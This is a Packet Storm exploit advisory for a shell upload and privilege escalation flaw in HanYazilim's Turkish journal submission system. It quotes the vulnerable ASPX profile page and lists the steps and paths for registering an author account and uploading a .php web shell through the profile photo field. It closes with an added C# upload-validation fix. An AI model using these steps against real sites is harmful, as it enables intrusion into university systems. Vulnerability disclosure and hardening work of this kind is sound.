Packet Storm | KingSkrupellos | PACKETSTORM:151818
Published: Feb 22, 2019 - 12:00 a.m.

HanYazilim Paper Submission System .NET 1.0 Shell Upload

`#################################################################################  
  
# Exploit Title : HanYazilim Paper Submission System .NET v1.0 Privilege Escalation / Shell Upload  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 22/02/2019  
# Vendor Homepage : hanyazilim.com  
# Software Information Link : hanyazilim.com/hakemlimakaletakipsistemi.pdf , videolar.hanyazilim.com  
# CKEditor Simogeo Download : github.com/simogeo/ckeditor-adv_link/archive/master.zip  
# Software Version : 1.0  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : High  
# Vulnerability Types :  
CWE-266: Incorrect Privilege Assignment  
CWE-269: Improper Privilege Management  
CWE-284: Improper Access Control  
CWE-250: Execution with Unnecessary Privileges  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
  
#################################################################################  
  
# Description of the Software :  
***************************  
HanYazilim Makale Takip Sistemi .NET v1.0 is a Turkish article and journal tracking application used by Turkish university faculties.  
  
#################################################################################  
  
# Impact and Consequences :  
****************************  
* This Software [ Product ] HanYazilim Makale Takip Sistemi .NET v1.0 incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.  
  
* The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor.  
  
* The software performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.  
  
* The software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.  
  
#################################################################################  
  
# Vulnerable Source Code : [ uyelikbilgilerim.aspx ]  
*********************************************  
  
<%@ Page Language="C#" MasterPageFile="~/Uye.master" AutoEventWireup="true"  
CodeFile="UyelikBilgilerim.aspx.cs" Inherits="UyelikBilgilerim"  
Title="Untitled Page" culture="auto" meta:resourcekey="PageResource1"  
uiculture="auto" %>  
  
<asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server">  
<style type="text/css">  
.style1  
{  
width: 801px;  
height: 70px;  
  
}  
.style7  
{  
width: 135px;  
}  
.style351  
{  
color: #FF0000;  
}  
.style357  
{  
width: 135px;  
height: 28px;  
}  
.style358  
{  
width: 1200px;  
height: 28px;  
}  
</style>  
<link href="images/mainstyle.css" rel="stylesheet" type="text/css" />  
  
</asp:Content>  
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1"  
Runat="Server">  
<table class="tablosayfaadi">  
<tr>  
<td class="tablosayfayazi">  
<asp:Label ID="Label1" runat="server" Text="Uye Detay/Member Details"  
meta:resourcekey="Label1Resource1"></asp:Label></td>  
</tr>  
</table>  
<table class="style1">  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
<asp:Label ID="Label4" runat="server" CssClass="style351"  
Text="Label"  
Visible="False"  
meta:resourcekey="Label4Resource1"></asp:Label>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label2" runat="server" Text="Adı Soyadı"  
meta:resourcekey="Label2Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:TextBox ID="TextBox1" runat="server" Width="290px"  
meta:resourcekey="TextBox1Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator1"  
runat="server"  
ControlToValidate="TextBox1" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator1Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label5" runat="server" Text="Unvan /Title"  
meta:resourcekey="Label5Resource1"></asp:Label></td>  
<td class="style8">  
<asp:DropDownList ID="DropDownList2" runat="server"  
meta:resourcekey="DropDownList2Resource1">  
<asp:ListItem Value="1"  
meta:resourcekey="ListItemResource1">Araştırma Görevlisi</asp:ListItem>  
<asp:ListItem Value="2"  
meta:resourcekey="ListItemResource2">Doktor</asp:ListItem>  
<asp:ListItem Value="3"  
meta:resourcekey="ListItemResource3">Yrd.Doçent</asp:ListItem>  
<asp:ListItem Value="4"  
meta:resourcekey="ListItemResource4">Doç. Dr.</asp:ListItem>  
<asp:ListItem Value="5"  
meta:resourcekey="ListItemResource5">Prof. Dr.</asp:ListItem>  
<asp:ListItem Value="6"  
meta:resourcekey="ListItemResource6">Diğer</asp:ListItem>  
</asp:DropDownList>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator10"  
runat="server"  
ControlToValidate="DropDownList2" ErrorMessage="*"  
InitialValue="0"  
  
meta:resourcekey="RequiredFieldValidator10Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label6" runat="server"  
Text="E-Posta /Email"  
  
meta:resourcekey="Label6Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:TextBox ID="TextBox3" runat="server" Width="290px"  
ReadOnly="True"  
meta:resourcekey="TextBox3Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator3"  
runat="server"  
ControlToValidate="TextBox3" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator3Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style357">  
<asp:Label ID="Label7" runat="server"  
Text="Parola /Password"  
  
meta:resourcekey="Label7Resource1"></asp:Label>  
</td>  
<td class="style358">  
<asp:TextBox ID="TextBox4" runat="server" Width="290px"  
meta:resourcekey="TextBox4Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator4"  
runat="server"  
ControlToValidate="TextBox4" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator4Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label8" runat="server"  
Text="İş Telefonu /Office Telephone"  
  
meta:resourcekey="Label8Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:TextBox ID="TextBox5" runat="server" Width="290px"  
meta:resourcekey="TextBox5Resource1"></asp:TextBox>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label9" runat="server"  
Text="Cep Telefonu /GSM"  
  
meta:resourcekey="Label9Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:TextBox ID="TextBox6" runat="server" Width="290px"  
meta:resourcekey="TextBox6Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator12"  
runat="server"  
ControlToValidate="TextBox6" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator12Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label10" runat="server"  
Text="Adresi /Address"  
  
meta:resourcekey="Label10Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:TextBox ID="TextBox7" runat="server" Width="290px"  
meta:resourcekey="TextBox7Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator9"  
runat="server"  
ControlToValidate="TextBox7" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator9Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label11" runat="server"  
Text="Kurumu /Institution"  
  
meta:resourcekey="Label11Resource1"></asp:Label></td>  
<td class="style6">  
<asp:TextBox ID="TextBox8" runat="server" Width="290px"  
meta:resourcekey="TextBox8Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator6"  
runat="server"  
ControlToValidate="TextBox8" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator6Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label12" runat="server"  
Text="Görevi /Task"  
  
meta:resourcekey="Label12Resource1"></asp:Label></td>  
<td class="style6">  
<asp:TextBox ID="Gorevi" runat="server" Width="290px"  
meta:resourcekey="GoreviResource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator13"  
runat="server"  
ControlToValidate="Gorevi" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator13Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label13" runat="server"  
Text="Alanı /Field"  
  
meta:resourcekey="Label13Resource1"></asp:Label></td>  
<td class="style6">  
<asp:TextBox ID="Alani" runat="server" Width="290px"  
meta:resourcekey="AlaniResource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator7"  
runat="server"  
ControlToValidate="Alani" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator7Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label14" runat="server"  
Text="Kısa Özgeçmiş /Short Biography"  
  
meta:resourcekey="Label14Resource1"></asp:Label></td>  
<td class="style6">  
<asp:TextBox ID="TextBox10" runat="server" Height="69px"  
TextMode="MultiLine"  
Width="290px"  
meta:resourcekey="TextBox10Resource1"></asp:TextBox>  
<asp:RequiredFieldValidator ID="RequiredFieldValidator8"  
runat="server"  
ControlToValidate="TextBox10" ErrorMessage="*"  
  
meta:resourcekey="RequiredFieldValidator8Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label15" runat="server"  
Text="Profil Fotografı /Profile Photo"  
  
meta:resourcekey="Label15Resource1"></asp:Label>  
</td>  
<td class="style6" valign="middle">  
<asp:Image ID="Image1" runat="server" Height="75px"  
Width="75px"  
meta:resourcekey="Image1Resource1" />  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
<asp:CheckBox ID="CheckBox2" runat="server"  
AutoPostBack="True"  
oncheckedchanged="CheckBox2_CheckedChanged"  
Text="Üyelik Resmini Değiştir /Change Profile Photo"  
meta:resourcekey="CheckBox2Resource1" />  
<asp:FileUpload ID="FileUpload1" runat="server"  
Visible="False"  
meta:resourcekey="FileUpload1Resource1" />  
<asp:RequiredFieldValidator ID="RequiredFieldValidator11"  
runat="server"  
ControlToValidate="FileUpload1" ErrorMessage="*"  
Visible="False"  
  
meta:resourcekey="RequiredFieldValidator11Resource1"></asp:RequiredFieldValidator>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label16" runat="server"  
Text="Üyelik Tipi /Membership Type"  
  
meta:resourcekey="Label16Resource1"></asp:Label>  
</td>  
<td class="style6">  
<asp:DropDownList ID="DropDownList1" runat="server"  
meta:resourcekey="DropDownList1Resource1">  
<asp:ListItem Value="1"  
meta:resourcekey="ListItemResource7">Yazar</asp:ListItem>  
<asp:ListItem Value="2"  
meta:resourcekey="ListItemResource8">Hakem</asp:ListItem>  
<asp:ListItem Value="3"  
meta:resourcekey="ListItemResource9">Editör</asp:ListItem>  
</asp:DropDownList>  
</td>  
</tr>  
<tr>  
<td class="style7">  
<asp:Label ID="Label17" runat="server" Text="Üyelik Durumu /Membership Status"  
meta:resourcekey="Label17Resource1"></asp:Label></td>  
<td class="style6">  
<asp:CheckBox ID="CheckBox1" runat="server"  
meta:resourcekey="CheckBox1Resource1" />  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;<asp:Label ID="Label18" runat="server" Text="Güvenlik Kodu"  
meta:resourcekey="Label18Resource1"></asp:Label></td>  
<td class="style6">  
<asp:TextBox ID="TextBox11" runat="server"  
meta:resourcekey="TextBox11Resource1"></asp:TextBox>  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
<img src="GuvenlikKodu.aspx">&nbsp;<asp:Label  
ID="lblDusunceler" runat="server"  
Visible="False"  
meta:resourcekey="lblDusuncelerResource1"></asp:Label>  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
<asp:Button ID="Button1" runat="server" Text="Değiştir /Change" Height="26px"  
onclick="Button1_Click1"  
meta:resourcekey="Button1Resource1" />  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
<asp:Label ID="Label3" runat="server" Text="Label"  
Visible="False"  
meta:resourcekey="Label3Resource1"></asp:Label>  
</td>  
</tr>  
<tr>  
<td class="style7">  
&nbsp;</td>  
<td class="style6">  
&nbsp;</td>  
</tr>  
</table>  
<table class="tablosayfaadi">  
<tr>  
<td class="tablosayfayazi">  
&nbsp;</td>  
</tr>  
</table>  
</asp:Content>  
  
#################################################################################  
  
# Privilege Escalation Exploit :  
***************************  
# Usage :  
*********  
# Register yourself as Author => [ Yazar ] account. [ New Admin ]  
  
# Registration with random e-mail address and choose Professor Doctor.  
  
# Put password for your account.  
  
# Fill All the Blanks. Enter Captchas.  
  
/YeniUyelik.aspx  
  
# After Successful Registration => it says =>  
  
Your registration has been completed successfully.  
  
Now you can login to the web site with your username and password..  
  
# Admin Panel Login Path :  
************************  
/Hata.aspx?Mesaj=3  
  
# Usable Author Control Links :  
****************************  
/UyeTumMakaleler.aspx?Mesaj=2  
/UyeTumMakaleler.aspx?Goster=0  
/UyeYayinlanacaklarDefault.aspx?Goster=4  
/Arama.aspx  
/MakaleGonder.aspx  
/Mesajlar.aspx  
/GonderilenMesajlar.aspx  
/MesajGonder.aspx  
  
Exploitation =>  
**************  
/ckeditor/plugins/simogeo/Browser.aspx  
  
/UyelikBilgilerim.aspx  
  
It says in Turkish Language :  
  
Üyelik Resmini Değiştir. [ Change your Membership picture ]  
  
Choose your .php file to upload from My Profile Photo.  
  
Shell Uploaded Successfully.  
  
Directory File Path :  
******************  
/UyeResimleri/[RANDOM-NUMBER]_[yourshellnamehere].php  
  
#################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
####################################################################  
`
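
The markup above exposes `FileUpload1` with only a `RequiredFieldValidator`, and the advisory reports that a `.php` file is accepted and stored under `/UyeResimleri/` with the client's file name kept. The following is an added example of the missing server-side check, not code from HanYazilim or from the advisory; the class name `ProfilePhotoValidator`, the method `TryGetSafeName` and the 1 MB limit are hypothetical.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;

public static class ProfilePhotoValidator
{
    public const int MaxBytes = 1024 * 1024; // assumed limit for a profile photo

    // Allowlisted extension -> leading bytes that the file content must start with.
    static readonly Dictionary<string, byte[]> Magic =
        new Dictionary<string, byte[]>(StringComparer.OrdinalIgnoreCase)
    {
        { ".jpg",  new byte[] { 0xFF, 0xD8, 0xFF } },
        { ".jpeg", new byte[] { 0xFF, 0xD8, 0xFF } },
        { ".png",  new byte[] { 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A } },
        { ".gif",  new byte[] { 0x47, 0x49, 0x46, 0x38 } }
    };

    // Returns a server-generated file name when the upload is acceptable, otherwise null.
    // In a WebForms code-behind the inputs would be FileUpload1.FileName and
    // FileUpload1.PostedFile.InputStream (a seekable stream is assumed).
    public static string TryGetSafeName(string clientName, Stream content)
    {
        if (content == null || content.Length == 0 || content.Length > MaxBytes) return null;
        string ext;
        try { ext = Path.GetExtension(clientName ?? ""); }
        catch (ArgumentException) { return null; } // illegal characters in the name
        byte[] magic;
        if (!Magic.TryGetValue(ext, out magic)) return null; // .php, .aspx, no extension
        byte[] head = new byte[magic.Length];
        content.Position = 0;
        int read = content.Read(head, 0, head.Length);
        content.Position = 0; // rewind so the caller can still save the stream
        if (read != magic.Length || !head.SequenceEqual(magic)) return null;
        // Never reuse the client-supplied name: only the allowlisted extension survives.
        return Guid.NewGuid().ToString("N") + ext.ToLowerInvariant();
    }

    public static void Main()
    {
        // Constructed samples: a PNG header and a text file posing as an image.
        var png = new MemoryStream(new byte[] { 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A, 0x00 });
        var text = new MemoryStream(Encoding.ASCII.GetBytes("not an image"));
        Console.WriteLine(TryGetSafeName("me.PNG", png) != null);
        Console.WriteLine(TryGetSafeName("photo.php", text) != null);
        Console.WriteLine(TryGetSafeName("photo.png", text) != null);
    }
}
```

A header check does not prove the rest of the file is a valid image, so the upload directory should also be served as static content only, with script handlers disabled for `/UyeResimleri/`.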